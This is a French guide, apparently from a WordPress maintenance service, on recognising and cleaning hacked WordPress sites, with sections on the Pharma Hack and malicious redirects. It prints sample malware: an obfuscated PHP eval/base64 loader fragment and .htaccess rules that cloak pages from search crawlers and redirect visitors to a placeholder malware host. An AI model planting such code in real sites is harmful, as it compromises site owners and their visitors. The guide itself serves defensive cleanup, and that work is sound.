10 signes indiquant que votre site WordPress est piraté

Signes avant-coureurs d’un site WordPress piraté

Les sites WordPress sont connus pour être piratés. Il existe une idée fausse très répandue selon laquelle WordPress est défectueux et facile à pirater. La vérité est que WordPress est le CMS le plus populaire, alimentant près de 40% de tous les sites du web. On peut donc s’attendre à ce que les pirates informatiques la ciblent le plus souvent, statistiquement.

Même si les opposants se trompent, la menace est réelle. Il se peut que vous rencontriez des problèmes ou que vous remarquiez des choses bizarres sur votre site et que vous soupçonniez qu’il soit compromis. S’il est parfois facile de repérer un site WordPress piraté, il arrive que le malware ne soit pas si évident.

Voici une liste de signes qui, s’ils sont présents, peuvent signifier que votre site WordPress a été piraté.

1.Page d’accueil défigurée

C’est l’un des signes les plus évidents montrant que quelqu’un a piraté votre site. C’est ce que font les pirates informatiques pour se faire un nom. Dans la plupart des cas, la vantardise n’est pas la principale intention du pirate. Ce qu’ils veulent faire, c’est tirer profit de votre trafic. Mais dans certains cas, ils le font juste pour le plaisir et la notoriété.

Quelle que soit l’intention, cela signifie toujours que quelqu’un a le contrôle de votre site. La dégradation aura un impact négatif sur votre réputation, entraînant une baisse du trafic et, naturellement, une perte de revenus.

2.Votre site redirige vos visiteurs

Les redirections malveillantes peuvent se présenter sous de nombreuses formes. Parfois, les pirates insèrent des liens sur les pages, d’autres fois ils insèrent des scripts qui redirigent vos visiteurs dès qu’ils essaient de charger le site. Selon le scénario, des redirections peuvent arriver à ceux qui utilisent des appareils mobiles et ne redirigent pas les autres.

Bien qu’il puisse être difficile à repérer, dans la plupart des cas, il est vraiment simple à reproduire. Il suffit de visiter votre site WordPress piraté alors que vous êtes déconnecté et de voir si votre site vous redirige vers un autre site. Si vous arrivez sur une autre page, il est probable que vous verrez une fenêtre contextuelle indiquant que votre ordinateur est infecté par un logiciel malveillant. De plus, la fenêtre contextuelle aura la possibilité de télécharger un logiciel de suppression de logiciels malveillants qui est en fait un logiciel malveillant lui-même, sous une forme déguisée.

Selon l’expérience que vos visiteurs ont du web, certains peuvent être la proie d’un pirate s’ils téléchargent un logiciel à partir de la page vers laquelle ils sont redirigés. C’est pourquoi il est important de traiter cette question rapidement.

3.Le trafic diminue soudainement

Si vous utilisez Google Analytics, vous pourriez remarquer une baisse soudaine des statistiques de trafic. Ceci est le résultat de logiciels malveillants qui redirigent vos visiteurs vers des sites de spam. De plus, si votre site est marqué comme dangereux sur Google ou même sur une liste noire, il faut alors savoir clairement pourquoi les gens évitent votre site.

4.Impossible de se connecter à votre tableau de bord WordPress

C’est un symptôme délicat. Parfois, il peut arriver que nous soyons absolument sûrs du mot de passe et que nous commencions à penser que quelqu’un l’a changé. Je suis passé par là. J’ai oublié que j’ai mis une majuscule ici et un point là, un caractère spécial à la fin et ainsi de suite.

Cependant, si vous êtes absolument certain de votre mot de passe, que vous ne l’avez pas changé et que personne d’autre n’a eu accès à votre mot de passe pour le changer, cela peut signifier que quelqu’un a piraté votre compte administrateur. Cela signifie également que les pirates informatiques pourront créer des utilisateurs supplémentaires, modifier la présentation du site et faire beaucoup plus de dégâts si cette situation n’est pas traitée correctement et rapidement.

5.Administrer des comptes qui ne devraient pas être là

If you notice that there’s an admin user that you cannot recall adding, this is a big warning sign. Again, it can happen that we forgot that we granted admin privileges to a new team member, but if you are certain that’s not the case, you are looking at a hacker’s admin user.

But, suspicious admin users are not the only ones you should be concerned with. If you are using an outdated plugin that has a vulnerability, admin can create countless numbers of subscribers and grant them admin privileges. In that sense, that user is equal to the super-admin and can do whatever they please.

6.Un site web lent ou peu réactif

C’est l’un de ces signes incertains. Les gens ont tendance à remplir leurs sites de dizaines de plugins, dont certains sont connus pour solliciter les ressources du serveur, ce qui n’est pas forcément un signe fiable que quelqu’un a piraté votre site.

Cependant, si vous n’avez fait aucune modification et que votre site devient lent et ne répond plus du jour au lendemain, vous pourriez être victime d’une attaque dite DDoS. DDoS signifie “Distributed Denial of Service” (déni de service distribué). En gros, ce type d’attaque utilise un réseau d’ordinateurs avec de fausses adresses IP qui envoient d’innombrables requêtes à votre serveur. Une fois que les attaquants ont inondé le serveur d’un nombre suffisant de requêtes, celui-ci commence à faire des pépins et devient incapable de répondre à la fin.

7.Les e-mails générés sur votre site sont bloqués

De nombreux administrateurs de WordPress utilisent des formulaires de contact pour interagir avec leurs visiteurs. Souvent, les formulaires envoient des notifications par courrier électronique depuis le site en utilisant le serveur de messagerie par défaut. Les pirates informatiques piratent souvent les sites avec l’intention d’utiliser les serveurs de messagerie pour le spam. Si vous remarquez que vous ne recevez pas les courriels générés sur votre site, appelez votre hébergeur. S’il vous dit qu’il vous a bloqué à cause du spam et que vous êtes sûr de ne pas avoir enfreint les limites quotidiennes de courrier électronique, cela est préoccupant.

Parfois, les hébergeurs effectuent des analyses quotidiennes ou hebdomadaires des logiciels malveillants. Dans ce cas, ils vous contactent immédiatement et vous informent que votre site WordPress a été piraté et suspendu de leur service.

8. Fichiers ou répertoires étranges sur votre site

Si vous ne l’avez pas déjà fait après avoir lu les étapes ci-dessus, c’est le moment idéal. Accédez à votre serveur en utilisant le FTP (ou le gestionnaire de fichiers si disponible) et vérifiez votre répertoire racine WordPress.

Selon le degré de sophistication du piratage, vous ne verrez peut-être rien d’étrange si vous ne creusez pas assez profondément. Vous devriez commencer par vérifier les fichiers suivants :

  • .htaccess
  • wp-config.php
  • index.php

Si vous voyez un code qui ressemble à un chiffre ou quelque chose de similaire, cela signifie que quelqu’un a modifié ces fichiers. Parfois, les pirates informatiques tentent de masquer les fichiers en leur donnant des noms similaires à ceux que l’on trouve normalement dans une installation WordPress ou dans un plugin ou un thème WordPress.

Souvent, les fichiers qui ont des noms génériques comme admin.class.php, admin.old.php ou qui peuvent être des fichiers malveillants. Ces fichiers doivent être supprimés afin d’empêcher le piratage. Souvent, cela ne suffit pas car cela signifie qu’il existe une porte dérobée que les pirates utilisent pour télécharger ou modifier des fichiers sur votre site. Ils peuvent simplement réajouter les fichiers après que vous les ayez supprimés et continuer là où ils se sont arrêtés.

C’est en fait l’un des signes les plus forts d’un site WordPress piraté, vous devez donc lancer la procédure de nettoyage dès que possible.

9.Résultats de recherche détournés

L’un des piratages les plus sophistiqués consiste à pirater les résultats de recherche. Qu’est-ce que cela signifie ? C’est un type de piratage qui vise les moteurs de recherche. Lorsque quelqu’un tape votre nom de domaine sur Google ou d’autres moteurs de recherche, il obtient des résultats de recherche contenant votre page d’accueil et toutes les autres pages indexées.

C’est ce qu’on appelle un piratage SEO. Ce hack va insérer un lien vers un site spammé, une pharmacie en ligne ou une autre page indésirable parmi la liste des pages légitimes de votre site. Parmi les spams les plus courants de WordPress, on trouve le “Japanese Keyword Hack” et le “Pharma Hack”.

Il est assez facile de vérifier l’apparence de vos résultats de recherche, quelle que soit la qualité de votre classement dans Google. Allez sur Google et tapez “site:votredomaine.com” dans la barre de recherche. Il va sans dire que vous devez remplacer “votredomaine.com” par votre nom de domaine réel.

Les résultats de la recherche ne doivent afficher que les pages de votre site. Si vous remarquez que certaines pages proposent des produits pharmaceutiques ou tout autre chose qui n’a rien à voir avec votre site, cela signifie que vous êtes victime du piratage de l’OMR.

Le problème majeur est que ce piratage est généralement invisible pour vous ou vos visiteurs. Il peut s’écouler des mois avant que vous ou quelqu’un d’autre ne le découvre. Il peut être très difficile à supprimer définitivement car il sera le plus souvent astucieusement dissimulé dans vos fichiers et votre base de données.

Un service professionnel de suppression des logiciels malveillants devrait peut-être s’en charger pour vous.

10. Écran blanc de la mort (WSOD)

J’ai gardé celui-ci pour la fin car ce n’est pas toujours le signe que quelqu’un a piraté votre site. Souvent, un écran blanc de mort sera le résultat d’un échec de mise à jour de plugin, de thème ou de noyau, de conflits plugin/thème ou quelque chose de similaire.

Cependant, si vous voyez un écran blanc de mort lorsque vous essayez d’accéder à wp-admin, alors cela peut tout aussi bien signifier qu’il y a un logiciel malveillant sur le site. Les scripts de logiciels malveillants peuvent contenir un code qui empêche l’affichage d’erreurs, de sorte qu’au lieu de voir une liste d’erreurs, vous verrez simplement une page blanche.

WordPress Pharma / Viagra Hack – Les résultats de Google affichent les résultats de Viagra / Cialis

pharma hack spam

Qu’est-ce que le piratage de l’industrie pharmaceutique ?


Il y a des années, un client m’a demandé de supprimer une page de son site WordPress. Une page concernant les produits pharmaceutiques. J’ai fait des recherches parmi les articles, les pages, les types d’articles personnalisés ou tout autre chose à laquelle j’ai pu penser et j’ai passé des jours à assurer au client qu’aucune page ou article de ce type n’existait sur son site WordPress.

Ils ont péniblement insisté et ont dit avoir trouvé une page en vérifiant les résultats de recherche de leur site sur Google. J’ai vérifié les résultats moi-même et, à ma grande surprise, j’ai trouvé la page qu’ils ont mentionnée. Cette page renvoyait à un autre domaine qui vendait des médicaments en ligne, mais l’URL provenait du site de mon client. Je me suis dit : “C’est probablement une erreur de la part de Google, non ?”.

Faux ! C’était le Pharma Hack.

Alors, qu’est-ce que Pharma Hack exactement ? WordPress Pharma Hack est une méthode d’injection de spam. Son but est de rediriger les visiteurs d’un site par ailleurs légitime vers des sites de vendeurs de pharmacies qui vendent des médicaments interdits (comme le Viagra, le Cialis, le Nexium, etc.) ou qui proposent généralement des médicaments sur ordonnance – sans ordonnance.

Il s’agit d’un système très subtil – on peut le considérer comme un parasite qui se nourrit des pages les plus importantes du site dans le but d’obtenir des liens utiles. Vous et vos visiteurs ne le verrez pas, il ne provoque aucun dysfonctionnement visible et je n’ai pas encore entendu dire qu’un tel piratage a provoqué le crash du site. Cela semble presque inoffensif.

Mais c’est parce que c’est un parasite intelligent – il a besoin d’un hôte vivant et ne veut pas éveiller de soupçons et se faire remarquer. Comme il est très discret, il travaille généralement derrière le rideau pendant des mois et des mois avant que les propriétaires du site ne le remarquent et ne le suppriment. Il est également très probable qu’elle revienne si elle n’est pas enlevée correctement. Cela va lentement dégrader votre référencement et votre réputation en rien, obtenez vous avez été mis sur la liste noire de Google et cela vous a probablement coûté un peu (ou beaucoup) d’argent. Pas si inoffensif, n’est-ce pas ?

Comment savoir si votre site WordPress est infecté par le Pharma Hack ?

  1. Utilisez les opérateurs de recherche avancée de Google
    Comme le piratage est invisible pour vous, vous devez recourir à un outil qui vous aidera à le démasquer : le moteur de recherche. Il vous suffit d’ouvrir Google.com et de rechercher votre nom de domaine (en tapant simplement i.e. domain.com) ou d’utiliser les opérateurs de recherche avancée de Google comme “site:votredomaine.com”, “inurl:votredomaine.com”, etc.

Si vous utilisez l’opérateur “site:votredomaine.com”, Google répertoriera toutes vos pages indexées. Certains des résultats pourraient inclure des liens Pharma Hack comme celui-ci :

Si vous souhaitez être plus précis, vous pouvez lancer la recherche en utilisant “inurl:votredomaine.com viagra” (vous devez bien sûr remplacer “votredomaine.com” par votre propre nom de domaine et vous pouvez également rechercher un autre nom de médicament).

Vous trouverez sur cette page des instructions sur la manière d’utiliser les opérateurs de recherche avancée de Google.

  1. Chercher la page en tant que Googlebot
    La raison pour laquelle les pages ne sont visibles que sur les moteurs de recherche est que le Pharma Hack n’est visible que par certains agents-utilisateurs, comme Googlebot. Cela signifie que même si vous avez trouvé une page sur Google qui redirige vers le site d’un pharmacien, vous ne pourrez pas voir le piratage même si vous consultez la source de la page, car votre navigateur a une chaîne User-Agent différente.

Afin de visualiser la page telle qu’elle serait vue par le Googlebot, vous aurez besoin d’un navigateur Chome User-Agent Switcher ou Firefox User-Agent Switcher add-on.

Après avoir installé le module complémentaire User-Agent Switcher de votre navigateur préféré, vous devez vous rendre sur la page qui s’est affichée comme étant piratée dans les résultats de recherche Google. Ensuite, la chaîne User-Agent devra être modifiée comme suit :

La chaîne User-Agent devra être remplacée par l’une de ces valeurs :

  • Mozilla/5.0 (compatible ; Googlebot/2.1 ; +http://www.google.com/bot.html)
  • Googlebot/2.1 (+http://www.googlebot.com/bot.html)
  • Googlebot/2.1 (+http://www.google.com/bot.html)


Après cela, il vous suffit de consulter la page source et vous pourrez voir la redirection vers le site d’un vendeur de produits pharmaceutiques :

Important : Ne laissez pas l’add-on User-Agent Switcher actif. Comme vous imiterez Googlebot, les sites dotés d’une sécurité adéquate le remarqueront et vous bloqueront temporairement ou définitivement.

Comment fonctionne le Pharma Hack ?

Comme mentionné précédemment, vous et vos visiteurs ne remarquerez aucun changement sur le site. Le Pharma Hack va passer outre la balise titre et insérer des liens de spam dans le contenu de la page. Cette balise de titre modifiée et les liens de spam ne sont visibles que par les moteurs de recherche et les crawlers de moteurs de recherche (comme Googlebot). Cette méthode s’appelle le camouflage.

Où le Pharma Hack cache-t-il son code ?

Comme la plupart des hackers de WordPress, le hack de Pharma utilise le noyau de votre site, le plugin et les fichiers de thème pour stocker ses logiciels malveillants. Dans ce cas, le Pharma Hack utilise également la base de données pour conserver la persistance.

Par le biais de fichiers malveillants dans les répertoires par défaut de WordPress (noyau, plugins, thèmes)

Les fichiers malveillants doivent être placés dans votre répertoire WordPress. Ils contiennent généralement des fonctions telles que base64_decode() et eval(). En ce sens, le Pharma Hack n’est pas différent de tout autre hack.

Par le biais d’un code crypté dans la base de données WordPress
Ce qui est différent, c’est que, avec Pharma Hack, ces fonctions sont stockées dans la base de données sous forme de chaînes de caractères et codées à l’envers, ce qui en rend beaucoup plus difficile à trouver et à éliminer. Lorsque le fichier de piratage est exécuté, il tire les chaînes de la base de données, les décode et les exécute en tant que fonctions.

Par exemple, jetez un coup d’œil à ceci :

JHBoYXJtYWhhY2sgPSAnVGhpcyBpcyBwaGFybWEgaGFjay4nOwplY2hvICRwaGFybWFoYWNrOwo=

On dirait du charabia, mais lorsqu’il est décodé avec la fonction base64_decode(), il le devient :

Bien sûr, le code que j’ai écrit est inoffensif et ne fait rien, mais n’importe quel code malveillant peut avoir l’air identique, comme une chaîne aléatoire de caractères alphanumériques, mais en fait il met en place une redirection sur votre site qui peut amener votre prochain visiteur à une page qui propose le Propranolol sans ordonnance.

Comment supprimer le “Pharma Hack


Comme mentionné précédemment, le Pharma Hack se compose de deux parties, les fichiers de piratage qui permettent un accès détourné et le code crypté dans la base de données.

Afin de supprimer correctement le WordPress Pharma Hack, il faudrait s’occuper des deux. En profondeur. Si l’un des fichiers reste sur le serveur, une réinfection est tout simplement inévitable et vous revenez à la case départ.

Avant de travailler sur votre site WordPress, assurez-vous de faire une sauvegarde de vos fichiers WordPress (fichiers de base, thèmes et plugins) et de la base de données afin de pouvoir la restaurer au cas où quelque chose tournerait mal.

Conseil : Si vous n’êtes pas familier avec l’utilisation du FTP pour vous connecter à votre serveur (ou au moins avec le gestionnaire de fichiers comme celui du cPanel) et, plus important encore, si vous n’êtes pas familier avec phpMyAdmin, je vous déconseille fortement de suivre les instructions ci-dessous. Dans ce cas, je vous suggère de soumettre une demande de correction de piratage pharmaceutique par l’intermédiaire de notre service de suppression des logiciels malveillants.

Suppression des fichiers piratés de WordPress


Je ne vais pas mentir – c’est un travail ennuyeux, mais quelqu’un doit le faire. Ce que vous devez faire, c’est vérifier si des fichiers suspects se trouvent dans les répertoires des plugins et des thèmes. J’espère que vous n’êtes pas un de ces propriétaires de sites qui ont un plugin pour TOUT et qui gardent 12 thèmes inactifs juste au cas où. Si vous êtes cette personne, vous avez des heures, non, des jours pour fouiller dans les dossiers.

Ci-dessous, nous allons montrer un exemple d’inspection et de suppression de fichiers piratés. Vous devez répéter le processus pour tous les fichiers de base, les thèmes et les plugins de votre site WordPress.

Connexion à votre serveur d’hébergement
Vous devrez vous connecter à votre serveur d’hébergement par FTP ou vous connecter à cPanel et utiliser le gestionnaire de fichiers (que j’utiliserai dans les exemples ci-dessous).

Une fois connecté, vous devez vous assurer que l’option “Afficher les fichiers cachés” est cochée :

Allons dans le répertoire des plugins d’Akismet – allez dans “wp-content” -> “plugins” -> “Akismet”.

Trouver les fichiers piratés et les logiciels malveillants

La première chose à laquelle vous devez prêter attention, ce sont les conventions d’appellation. Les fichiers piratés ont généralement une pseudo-extension au milieu (comme .class, .cache, .old) afin d’imiter les véritables fichiers de plugin.

De plus, un point devant le nom du fichier (comme “.htaccess”) cachera le fichier à moins que l’option “Afficher les fichiers cachés” ne soit activée. C’est toujours un motif de suspicion.

Pour confirmer, le contenu de ces dossiers devrait ressembler à ceci :

< ? php $XZKsyG= ‘as’;$RqoaUO= ‘e’;$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t’;$joEDdb
= “b”.$XZKsyG.$RqoaUO.(64). “_”. “d”.$RqoaUO. “c”. “o”. “d”.$RqoaUO;@$ygDOEJ(@$j
oEDdb(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY…

Si vous n’êtes pas sûr que le fichier fait partie intégrante du plugin, vous pouvez télécharger la nouvelle version du plugin à partir de WordPress.org et comparer le contenu du répertoire du plugin sur votre serveur et l’installer.

Le fichier .htaccess

Le fichier .htaccess serait également un bon endroit pour vérifier. C’est un exemple de code qui ne devrait pas être là :

RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] #checks for Google, Yahoo, msn, aol and bing crawler
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ somehackfile.php?$1 [L] #redirecte vers un fichier piraté

Si vous voyez un code comme celui-ci, il est préférable de le supprimer. Bien entendu, vous devez sauvegarder une copie de sauvegarde du fichier .htaccess au cas où. Si vous avez besoin de recréer le fichier, allez simplement dans votre tableau de bord WordPress, puis allez dans “Paramètres” -> “Permaliens” et cliquez sur “Enregistrer” (vous n’avez pas à modifier la structure des permaliens) et le fichier .htaccess sera régénéré.

Rechercher les différences de contenu des fichiers

Cela peut être un peu trop pour certains plugins qui ont un grand nombre de fichiers (comme le JetPack). Vous pouvez donc aussi utiliser le scanner d’exploitation ou un plugin de sécurité similaire pour vérifier les modifications de fichiers. Le plugin Exploit Scanner recherchera dans tous les fichiers de base de WordPress, les thèmes et plugins de tiers qui sont distribués par le dépôt officiel de WordPress, ainsi que dans les tables des messages et commentaires de votre base de données, les entrées suspectes et les noms de fichiers inhabituels. L’inconvénient est que le plugin Exploit Scanner génère un grand nombre de faux positifs. Vous devez donc vérifier chaque résultat qu’il produit alors qu’il ne fonctionne pas avec les plugins premium ou les plugins personnalisés.

Une fois que vous avez découvert quels fichiers sont piratés et distribuent des logiciels malveillants, vous devez les supprimer immédiatement. Si vous avez trouvé un plugin piraté qui contient un grand nombre de fichiers, il est probablement plus efficace de supprimer le plugin entier et de le réinstaller à partir de zéro. La plupart du temps, les options et les paramètres des plugins sont stockés dans la base de données de votre site, de sorte que la restauration des fichiers de plugins par défaut ne vous portera pas préjudice.

Une fois que vous aurez supprimé tous vos fichiers WordPress piratés, les symptômes de Pharma Hack devraient disparaître et les résultats de recherche de votre site reviendront à la normale après quelques jours (Google doit parcourir à nouveau votre site pour vérifier qu’il est propre). Toutefois, cela ne met pas fin au processus de nettoyage, car vous devrez encore traiter le code résiduel dans la base de données.

Gardez à l’esprit que si des fichiers piratés sont laissés derrière vous, votre site WordPress sera tôt ou tard réinfecté par le Pharma Hack. Cela dit, passons au nettoyage de la base de données.

Suppression des codes malveillants de la base de données WordPress

Toutes les instructions ci-dessous impliquent une manipulation de la base de données, il est donc important de ψreate une sauvegarde de votre base de données (si vous ne l’avez pas déjà fait)
et suivez bien les instructions, car toute improvisation pourrait faire planter votre site.

Encore une fois, si vous n’êtes pas à l’aise pour effectuer des modifications via phpMyAdmin, c’est une bonne idée d’engager un professionnel ou d’essayer notre service de suppression des logiciels malveillants.

Connectez-vous à phpMyAdmin

Si vous utilisez un pack d’hébergement avec cPanel, cette étape est facile. Il vous suffit de cliquer sur l’icône “phpMyAdmin” :

Sinon, vous aurez besoin d’une URL de connexion phpMyAdmin, d’un nom d’utilisateur et d’un mot de passe. Votre fournisseur d’hébergement devrait pouvoir vous aider à cet égard.

Sélectionner la bonne base de données

Une fois connecté, vous devrez sélectionner la bonne base de données, pour vous assurer que vous effectuez les modifications au bon endroit.

Si vous avez plus d’une base de données, vous pouvez vérifier votre fichier wp-config.php et rechercher le nom de la base de données. Il sera dans la ligne de code suivante – define(‘DB_NAME’, ‘yourdatabasename’) ;

Recherche de codes malveillants

Maintenant que vous avez sélectionné la bonne base de données, vous devrez naviguer vers la table “wp_options” (le préfixe de la table peut être différent selon la façon dont il a été défini lors de l’installation de votre site WordPress). Une liste de tableaux WordPress doit être affichée sur le côté gauche de l’écran (vous pouvez soit cliquer sur cette entrée, soit sur le bouton “Parcourir” de la liste du milieu) :

Après avoir sélectionné la table wp_options, vous devrez rechercher les entrées malveillantes de la base de données en utilisant l’onglet Recherche en haut de la page.

Les entrées que vous devrez rechercher en les saisissant dans le champ “nom_option” sont les suivantes :

  • wp_check_hash
  • support_générique_de_classe
  • widget_generic_support
  • ftp_credentials
  • fwp
  • rss_%

Attention ! Dans ce cas, vous devez supprimer toutes les correspondances sauf rss_language, rss_use_excerpt et rss_excerpt_length (il s’agit d’entrées légitimes de la base de données WordPress).

Faites bien attention à ne pas supprimer des informations importantes dans le tableau wp_options, car cela pourrait produire des erreurs ou même faire planter votre site WordPress.

Comment vérifier que votre site WP est propre

Répétez la recherche sur Google en utilisant les mêmes opérateurs de recherche

Après avoir supprimé les fichiers piratés de WordPress de votre site, les résultats de recherche sur Google devraient se normaliser. Vous devez ensuite répéter la recherche Google, en utilisant les opérateurs de la Recherche avancée pour vérifier si certaines des pages apparaissent toujours dans les résultats.

Il ne serait pas surprenant que certains des résultats de Pharma Hack soient encore visibles. Google indexe votre site depuis un certain temps et il faut parfois plusieurs jours, voire plusieurs semaines, pour réparer les dégâts. Cela pourrait également signifier que certains fichiers piratés sont toujours présents sur les serveurs, vous devriez donc répéter la procédure de nettoyage de Pharma Hack.

Utiliser les outils Google pour les webmasters

Les Google Webmaster Tools devraient être utilisés pour réindexer le site après que le Pharma Hack ait été complètement supprimé. L’option État de l’index et logiciels malveillants peut vous indiquer si le site est toujours signalé comme infecté par Google.

Comment scanner votre site à la recherche d’entrées piratées

Il existe un certain nombre de plugins de sécurité qui peuvent déterminer s’il y a ou non une infection par un malware sur votre site. Comme indiqué précédemment, le Pharma Hack peut être extrêmement difficile à attraper, il est donc tout à fait possible qu’il soit manqué par un plugin de sécurité.

Il existe également des scanners de site, que différentes entreprises fournissent gratuitement.

Comment forcer Google à ré-indexer votre site WordPress gratuit Pharma Hack

Soumettre un nouveau plan du site

Un plan du site contient une liste de toutes les pages et de tous les messages de votre site. Le fait de soumettre le plan du site pourrait accélérer le processus de réindexation. Si vous avez déjà un plan de site, essayez de le supprimer et de le soumettre à nouveau. Cela permettra également de supprimer toutes les pages et URL liées aux produits pharmaceutiques (le cas échéant).

L’outil de suppression de contenu obsolète de Google

Si certaines pages sont encore indexées avec le Pharma Hack, elles doivent être soumises pour suppression. Même si votre site WordPress est exempt de Pharma Hack, certaines des pages piratées apparaîtront toujours dans le résultat de recherche de Google. Google vous permet désormais de demander la suppression de ces pages obsolètes via l’outil Supprimer le contenu obsolète. Si c’est le cas, copiez l’URL comme indiqué dans les résultats de recherche Google, puis collez-la dans l’outil et demandez sa suppression.

Comment sécuriser le site pour d’éventuelles futures attaques de piratage

Toute tentative de piratage réussie (ou non) commence par une tentative d’exploitation des faiblesses du site. Le plus souvent, l’infection par des logiciels malveillants est possible en raison de l’utilisation de logiciels obsolètes ou périmés, comme le noyau, les thèmes et les plugins de WordPress. Des mises à jour régulières sont une étape importante pour accroître la sécurité de votre site.

Après avoir supprimé le logiciel malveillant, vous pouvez modifier les informations d’identification FTP, supprimer les utilisateurs inconnus et limiter les privilèges des utilisateurs. Il est également judicieux de mettre en place un plugin de sécurité et de surveiller votre site.

Nous vous suggérons de lire notre article détaillé sur la manière de protéger un site WordPress contre le piratage. Il est long mais nous sommes certains qu’il vous aidera à sécuriser votre site WordPress contre les pirates comme Pharma et les redirections de logiciels malveillants.

Répétez le nettoyage de la pharmacie pour tous vos sites WordPress

Si vous hébergez plus d’un site WordPress sous le même compte de piratage, vous DEVEZ nettoyer tous les sites, sinon il sera piraté encore et encore. Il est très fréquent que nous recevions des demandes de hacking pour un site WordPress et que nous y trouvions deux sites ou plus sous le même compte d’hébergement. Dans ce cas, nous suggérons à nos clients de nous laisser les nettoyer tous ou bien nous préférons abandonner la demande car nous ne pouvons pas garantir que le site dont le nettoyage est demandé restera propre dans un avenir proche.

Dernières réflexions

Le Pharma Hack existe depuis longtemps et il est en constante évolution. L’enlever est toujours difficile et prend du temps, surtout si la réinfection se produit. Les étapes de diagnostic et de réparation du hack fournies dans cet article devraient vous aider à lutter efficacement contre ce problème et à réduire les chances qu’il se reproduise à l’avenir. Toutefois, si vous n’êtes pas sûr d’avoir réussi à supprimer le Pharma Hack et à sécuriser votre site contre les futures tentatives de piratage, vous pouvez opter pour nos services d’assistance et de maintenance WordPress. Il peut s’agir d’un coût supplémentaire maintenant, mais il peut vous faire économiser de l’argent à long terme.

Si votre site WordPress a été infecté par le piratage japonais, nous vous suggérons de consulter notre guide Comment identifier et réparer le piratage de mots-clés japonais.

Comment réparer le piratage de redirection de logiciels malveillants WordPress

Faire face à un piratage de redirection d’un logiciel malveillant WordPress, en général, est toujours une expérience frustrante. Les logiciels malveillants peuvent se présenter sous de nombreuses formes et présenter différents symptômes, pour ainsi dire. Elle peut modifier la présentation de votre site, ce que l’on appelle la défiguration, elle peut faire planter votre site ou même entraîner une perte partielle ou totale de contenu. Parfois, vous ne savez même pas qu’il est là.

Tout dépend du motif de l’attaque. Certaines personnes le font juste pour le plaisir. Oui, je sais – vous avez investi beaucoup d’argent, de temps et d’efforts dans votre site et cela fait vraiment mal de penser que quelqu’un le casse juste parce qu’il le peut et le veut. D’autre part, certains le font pour l’argent. Dans la plupart des cas, vous ne saurez pas pourquoi cela s’est produit.

La question la plus importante sera toujours : comment. Comment cela s’est-il produit et comment y remédier ? Dans cet article, nous aborderons le piratage de redirection de WordPress et ce qu’il faut faire à ce sujet.

Qu’est-ce qu’un “WordPress Malware Redirect Hack” ?

Le WordPress Redirect Hack est un processus qui redirige les visiteurs vers des sites de spam et de phishing dans le but de générer des impressions publicitaires. Il peut également s’agir d’une tentative de compromettre l’ordinateur d’un visiteur en lui proposant d’installer un logiciel qui agira en fait comme un logiciel malveillant.

À quoi cela ressemble-t-il ?

Diagnostiquer les redirections malveillantes de WordPress est assez simple car les symptômes sont évidents. Vous visitez votre site et au lieu de voir votre page d’accueil, vous êtes redirigé vers un autre endroit qui n’a absolument rien à voir avec votre site.

Les conséquences d’une redirection du malware WordPress

Quelles sont donc les conséquences d’un Redirect Hack (outre une hausse de votre tension artérielle) ? Tout ou partie de ces situations peuvent se produire :

  1. La réputation de votre site et de votre référencement sera dégradée (voire détruite)

Les visiteurs perdent tout simplement confiance après avoir été constamment redirigés vers des sites suspects.

2.Votre hébergeur pourrait fermer votre site

C’est exact. Votre fournisseur d’hébergement peut le faire si votre site est sur le serveur partagé afin d’éviter que d’autres sites ne soient également infectés.


3.Les dispositifs des visiteurs du site peuvent être compris et conduire à une faille de sécurité

Comme mentionné, il existe des moyens de faire parvenir des logiciels malveillants à l’ordinateur du visiteur et d’extraire des données sensibles.

4.Vous pourriez être mis sur la liste noire de Google
Google s’efforcera de protéger la réputation de ses résultats de recherche et marquera votre site comme étant peu sûr.

Comment détecter la redirection malveillante de WordPress

Pouvoir identifier le fichier compromis est l’étape la plus importante dans la suppression du logiciel malveillant. Toute installation de WordPress comporte des milliers de fichiers. Il va sans dire que la vérification manuelle de chacun d’entre eux n’est possible qu’en théorie.

L’idée principale ici est d’apprendre à confirmer que votre site a été compromis par le piratage de redirection et de décider ensuite de la meilleure marche à suivre pour le supprimer.

  1. Consulter le fichier .htaccess

Le .htaccess ne fait pas partie de WordPress. Il s’agit en fait d’un fichier de configuration du serveur Apache et, en tant que tel, il peut modifier le comportement par défaut du serveur. Le noyau de WordPress et certains plugins peuvent modifier automatiquement le .htaccess pour permettre aux utilisateurs de configurer les paramètres de sécurité, les redirections, les en-têtes de cache, etc.

Si un hacker met la main sur le fichier .htaccess, il peut lui aussi créer des redirections.

Il s’agit du contenu d’un fichier .htaccess généré par défaut par WordPress

Commencer WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
Réécrire la règle . /index.php [L]

END WordPress

Le fichier .htaccess peut avoir beaucoup plus de lignes, pour le contrôle du cache, la sécurité et la redirection https et il n’y a pas de quoi s’inquiéter. Toutefois, certaines lignes de réacheminement sont préoccupantes.

Un des types d’attaques .htaccess redirige les utilisateurs qui proviennent des moteurs de recherche. Voici un exemple de ce code :

RewriteCond %{HTTP_REFERER} google. [OU] #vérifie si le visiteur a été référé par Google
RewriteCond %{HTTP_REFERER} .ask. [OR] #check if the visitor has been referred by Ask.com
RewriteCond %{HTTP_REFERER} .yahoo. [OU] #vérifie si le visiteur a été référé par Yahoo
RewriteCond %{HTTP_REFERER} .baidu. [OU] #check if the visitor has been referred by Baidu
RewriteRule ^(.*)$ http://malicioussite.com/malware.php [R=301,L] #si l’une des règles ci-dessus est “vraie”, c’est ici que l’utilisateur est redirigé

Cela peut également se faire sous forme abrégée, alors faites attention à cela aussi :

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.(google|ask|yahoo|baidu).(.) #Check if the visitor has been referred by Google or Ask or Yahoo or Baidu
RewriteRule ^(.*)$ http://malicioussite.com/malware.php [R=301,L] #La même redirection

Ce type de redirection est très bien dissimulé et il peut s’écouler des mois avant que le propriétaire du site ne le remarque ou qu’un visiteur ne le signale. En effet, toute personne se rendant directement sur le site ne remarquera aucune différence. C’est essentiellement le même principe que celui suivi par Pharma Hack.

